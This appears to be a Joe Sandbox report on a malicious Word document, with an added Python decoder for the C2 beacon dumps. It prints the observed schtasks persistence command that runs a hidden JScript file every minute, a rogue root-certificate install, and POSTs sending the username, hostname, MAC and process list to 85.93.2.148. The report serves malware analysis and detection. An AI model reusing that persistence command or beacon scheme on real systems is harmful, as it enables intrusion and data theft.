
Analysis Report

Overview

General Information

Joe Sandbox Version: 20.0.0
Analysis ID: 424458
Start time: 13:59:50
Joe Sandbox Product: Cloud
Start date: 09.11.2017
Overall analysis duration: 0h 4m 55s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: adjusted_records.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
Detection: MAL
Classification: mal100.evad.spre.expl.spyw.troj.winDOC@26/14@0/1
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
EGA Information: Failed
Cookbook Comments:
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint document
  • Simulate clicks
  • Found warning dialog
  • Click Ok
  • Number of clicks 1257
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): OSPPSVC.EXE, WmiApSrv.exe, conhost.exe, WMIADAP.exe, dllhost.exe
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE


Detection

Strategy    Score   Range      Reporting        Detection
Threshold   100     0 - 100    Report FP / FN   malicious


Confidence

Strategy    Score   Range    Further Analysis Required?   Confidence
Threshold   5       0 - 5    false


Classification

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons; more UI automation would likely extend the observed behavior.



Signature Overview



Software Vulnerabilities:

Potential document exploit detected (performs HTTP gets)
Source: global traffic | TCP traffic: 192.168.1.16:49163 -> 85.93.2.148:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic | TCP traffic: 192.168.1.16:49163 -> 85.93.2.148:443
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\cmd.exe

Networking:

Downloads files
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: POST /?page=get_information HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 | Accept: */* | Accept-Language: en-US | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Content-Length: 8414 | Host: 85.93.2.148
Source: global traffic | HTTP traffic detected: POST /?page=get_information HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 | Accept: */* | Accept-Language: en-US | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Content-Length: 8378 | Host: 85.93.2.148
Source: global traffic | HTTP traffic detected: POST /?page=get_process_list HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 | Accept: */* | Accept-Language: en-US | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Content-Length: 668 | Host: 85.93.2.148
Found strings which match to known social media urls
Source: wscript.exe | String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: wscript.exe | String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: wscript.exe | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Posts data to webserver
Source: unknown | HTTP traffic detected: POST /?page=wait HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 | Accept: */* | Accept-Language: en-US | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Content-Length: 68 | Host: 85.93.2.148
Urls found in memory or binary data
Source: WINWORD.EXE | String found in binary or memory: file:///
Source: WINWORD.EXE | String found in binary or memory: file:///%f
Source: WINWORD.EXE | String found in binary or memory: file:///C:
Source: WINWORD.EXE | String found in binary or memory: file:///C:/Users/user/Desktop/adjusted_records.doc
Source: WINWORD.EXE | String found in binary or memory: file:///C:/Users/user/Desktop/adjusted_records.doc))
Source: wscript.exe | String found in binary or memory: http://crl.comodo.net/UTN-USERFirst-Hardware.crl0q
Source: wscript.exe | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: wscript.exe | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wscript.exe | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wscript.exe | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: wscript.exe | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: wscript.exe | String found in binary or memory: http://crl.use
Source: wscript.exe | String found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
Source: wscript.exe | String found in binary or memory: http://crt.comodoca.com/UTNAddTrustServerCA.crt0$
Source: wscript.exe | String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: WINWORD.EXE | String found in binary or memory: http://ns.ad
Source: WINWORD.EXE | String found in binary or memory: http://ns.adbe.
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0%
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0-
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com0/
Source: wscript.exe | String found in binary or memory: http://ocsp.comodoca.com05
Source: wscript.exe | String found in binary or memory: http://ocsp.entrust.net03
Source: wscript.exe | String found in binary or memory: http://ocsp.entrust.net0D
Source: WINWORD.EXE | String found in binary or memory: http://p
Source: wscript.exe | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wscript.exe | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: WINWORD.EXE | String found in binary or memory: http://www.msnusers.com
Source: wscript.exe | String found in binary or memory: http://www.public-trust.com/CPS/OmniRoot.html0
Source: wscript.exe | String found in binary or memory: http://www.public-trust.com/cgi-bin/CRL/2018/cdp.crl0
Source: wscript.exe | String found in binary or memory: http://www.usertrust.com1
Source: wscript.exe | String found in binary or memory: https://
Source: wscript.exe | String found in binary or memory: https://85.93.2.148/?page=get_information
Source: wscript.exe | String found in binary or memory: https://85.93.2.148/?page=get_informationBK
Source: wscript.exe | String found in binary or memory: https://85.93.2.148/?page=get_informationY
Source: wscript.exe | String found in binary or memory: https://85.93.2.148/?page=get_informationx
Source: wscript.exe | String found in binary or memory: https://85.93.2.148/?page=get_process_list
Source: wscript.exe | String found in binary or memory: https://85.93.2.148/?page=get_process_listX
Source: wscript.exe | String found in binary or memory: https://85.93.2.148/?page=waitl
Source: wscript.exe | String found in binary or memory: https://97
Source: wscript.exe | String found in binary or memory: https://secure.comodo.com/CPS0
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown | Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown | Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49164
Uses a known web browser user agent for HTTP communication
Source: global traffic | HTTP traffic detected: POST /?page=wait HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 | Accept: */* | Accept-Language: en-US | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Content-Length: 68 | Host: 85.93.2.148
Source: global traffic | HTTP traffic detected: POST /?page=wait HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 | Accept: */* | Accept-Language: en-US | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Content-Length: 68 | Host: 85.93.2.148
Source: global traffic | HTTP traffic detected: POST /?page=get_information HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 | Accept: */* | Accept-Language: en-US | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Content-Length: 8414 | Host: 85.93.2.148
Source: global traffic | HTTP traffic detected: POST /?page=get_information HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 | Accept: */* | Accept-Language: en-US | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Content-Length: 8378 | Host: 85.93.2.148
Source: global traffic | HTTP traffic detected: POST /?page=wait HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 | Accept: */* | Accept-Language: en-US | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Content-Length: 68 | Host: 85.93.2.148
Source: global traffic | HTTP traffic detected: POST /?page=get_process_list HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded; Charset=UTF-8 | Accept: */* | Accept-Language: en-US | User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | Content-Length: 668 | Host: 85.93.2.148

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown | Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /f /tn 'Adobe Acrobat Player Task' /tr 'wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log' /sc minute /mo 1

Stealing of Sensitive Information:

Leaks process information
Source: global traffic | TCP traffic: 192.168.1.16:49171 -> 85.93.2.148:443
Uploads sensitive system information to the internet (privacy leak)
Source: 192.168.1.16:49163 -> 85.93.2.148:443HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&
Source: 192.168.1.16:49164 -> 85.93.2.148:443HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&
Source: 192.168.1.16:49168 -> 85.93.2.148:443HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADInf
Source: 192.168.1.16:49168 -> 85.93.2.148:443HTTP traffic detected: Header contains sensitive information computer (computername): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADIn
Source: 192.168.1.16:49168 -> 85.93.2.148:443HTTP traffic detected: Header contains sensitive information user (username): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADInfo
Source: 192.168.1.16:49169 -> 85.93.2.148:443HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADInf
Source: 192.168.1.16:49169 -> 85.93.2.148:443HTTP traffic detected: Header contains sensitive information computer (computername): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADIn
Source: 192.168.1.16:49169 -> 85.93.2.148:443HTTP traffic detected: Header contains sensitive information user (username): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADInfo
Source: 192.168.1.16:49170 -> 85.93.2.148:443HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&
Source: 192.168.1.16:49171 -> 85.93.2.148:443HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 53 79 73 74 65 6d 20 49 64 6c 65 20 50 72 6f 63 65 73 73 2a 30 7c 53 79 73 74 65 6d 2a 34 7c 73 6d 73 73 2e 65 78 65 2a 32 30 30 7c 63 73 72 73 73 2e 65 78 65 2a 32 37 36 7c 77 69 6e 69 6e 69 74 2e 65 78 65 2a 33 31 32 7c 63 73 72 73 73 2e 65 78 65 2a 33 32 30 7c 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 2a 33 34 38 7c 73 65 72 76 69 63 65 73 2e 65 78 65 2a 34 30 34 7c 6c 73 61 73 73 2e 65 78 65 2a 34 32 30 7c 6c 73 6d 2e 65 78 65 2a 34 32 38 7c 73 76 63 68 6f 73 74 2e 65 78 65 2a 35 33 36 7c 73 76 63 68 6f 73 74 2e 65 78 65 2a 36 30 30 7c 73 76 63 Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=System Idle Process*0|System*4|smss.exe*200|csrss.exe*276|wininit.exe*312|csrss.exe*320|winlogon.exe*34
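
The dumps above are the interesting part of this report, so here is an added example (mine, not part of the Joe Sandbox output) that decodes the "Data Raw" hex of the 49171 -> 443 POST into the beacon's form fields and pulls the structured parts out: the `bid` value, whose last 12 hex digits are the `b808cf8de4d6` MAC that the sandbox flagged as `macaddr`; the `info` field, which carries a `name*pid|name*pid` process list for `/?page=get_process_list` and a `Key:Value|Key:Value` host profile for `/?page=get_information`. The hex constant is copied from the report; the host-profile string is the report's "Data Ascii" rendering of the 49168 -> 443 POST. Both are truncated exactly as the sandbox prints them (the body starts at `ersion=`, the leading `v` of `version` is cut; the process list stops at `|svc`; the host profile stops at `ADInf`), and the parser is written to tolerate that. Which parser applies is decided by the `page` parameter from each request line. Function names and the `triage` result layout are my own. One caveat worth knowing when reading the "Uses a known web browser user agent" entry: `Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)` is the default User-Agent of the WinHttp.WinHttpRequest COM object, which is what a JScript dropper running under wscript.exe would use, not a browser.

```python
# Decoder and triage for the beacon bodies printed in this report (added example, not sandbox code).

# "Data Raw" column of the 192.168.1.16:49171 -> 85.93.2.148:443 POST (/?page=get_process_list),
# copied from the report. The sandbox prints a truncated window: it begins at "ersion=" and ends at "|svc".
PROCESS_LIST_DUMP_HEX = (
    "65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 "
    "67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d "
    "53 79 73 74 65 6d 20 49 64 6c 65 20 50 72 6f 63 65 73 73 2a 30 7c 53 79 73 74 65 6d 2a 34 7c "
    "73 6d 73 73 2e 65 78 65 2a 32 30 30 7c 63 73 72 73 73 2e 65 78 65 2a 32 37 36 7c 77 69 6e 69 6e 69 74 2e 65 78 65 2a 33 31 32 7c "
    "63 73 72 73 73 2e 65 78 65 2a 33 32 30 7c 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 2a 33 34 38 7c 73 65 72 76 69 63 65 73 2e 65 78 65 2a 34 30 34 7c "
    "6c 73 61 73 73 2e 65 78 65 2a 34 32 30 7c 6c 73 6d 2e 65 78 65 2a 34 32 38 7c 73 76 63 68 6f 73 74 2e 65 78 65 2a 35 33 36 7c "
    "73 76 63 68 6f 73 74 2e 65 78 65 2a 36 30 30 7c 73 76 63"
)

# "Data Ascii" column of the 49168 -> 443 POST (/?page=get_information), as the report prints it.
# Data Ascii is a truncated rendering; decode the Data Raw bytes when exact field values matter.
HOST_INFO_ASCII = (
    "ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info="
    "BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADInf"
)


def decode_raw(hex_text):
    """Turn the space-separated 'Data Raw' hex into text. latin-1 so every byte value decodes."""
    return bytes.fromhex(hex_text).decode("latin-1")


def parse_beacon(body):
    """Split the form body on '&' and '='. Done by hand rather than with urllib.parse.parse_qsl
    because the values are sent raw (spaces in process names are literal 0x20, not '+')."""
    fields = {}
    for part in body.split("&"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def mac_from_bid(bid):
    """The sandbox's 'macaddr' match is the last 12 hex digits of bid. The meaning of the leading
    8 digits is not shown in the report, so only the MAC is interpreted."""
    if len(bid) != 20 or any(c not in "0123456789abcdefABCDEF" for c in bid):
        raise ValueError("unexpected bid format: %r" % bid)
    mac = bid[-12:].lower()
    return ":".join(mac[i:i + 2] for i in range(0, 12, 2))


def parse_process_list(info):
    """'name*pid|name*pid|...' -> [(name, pid)]. An entry the dump cut off (no '*') gets pid None."""
    procs = []
    for entry in info.split("|"):
        name, star, pid = entry.rpartition("*")
        if star and pid.isdigit():
            procs.append((name, int(pid)))
        else:
            procs.append((entry, None))
    return procs


def parse_host_info(info):
    """'Key:Value|Key:Value|...' -> dict. A key the dump cut off before its ':' is dropped."""
    out = {}
    for entry in info.split("|"):
        key, colon, value = entry.partition(":")
        if colon:
            out[key] = value
    return out


def triage(page, body):
    """Summarise one beacon: page comes from the request line, body is the decoded POST body."""
    fields = parse_beacon(body)
    result = {
        "page": page,
        "bid": fields.get("bid"),
        "group": fields.get("group"),
        "key": fields.get("key"),
        "mac": mac_from_bid(fields["bid"]) if "bid" in fields else None,
    }
    info = fields.get("info", "")
    if page == "get_process_list":
        result["processes"] = parse_process_list(info)
    elif page == "get_information":
        result["host"] = parse_host_info(info)
    return result


if __name__ == "__main__":
    print(triage("get_process_list", decode_raw(PROCESS_LIST_DUMP_HEX)))
    print(triage("get_information", HOST_INFO_ASCII))
```

The `/?page=wait` POSTs (Content-Length 68) carry only the `ersion`/`bid`/`group`/`key` prefix shown in the 49163 and 49164 dumps, so `triage("wait", ...)` returns the identifiers and no `info` structure; that prefix is the stable part to key a network signature on, since `group=santi` and `key=ee9591dd8893` do not change between requests while `bid` is per victim.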

Persistence and Installation Behavior:

Installs new ROOT certificates
Source: C:\Windows\System32\wscript.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\wscript.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\wscript.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\wscript.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\wscript.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Spreading:

Creates COM task schedule object (often to register a task for autostart)
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe | Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
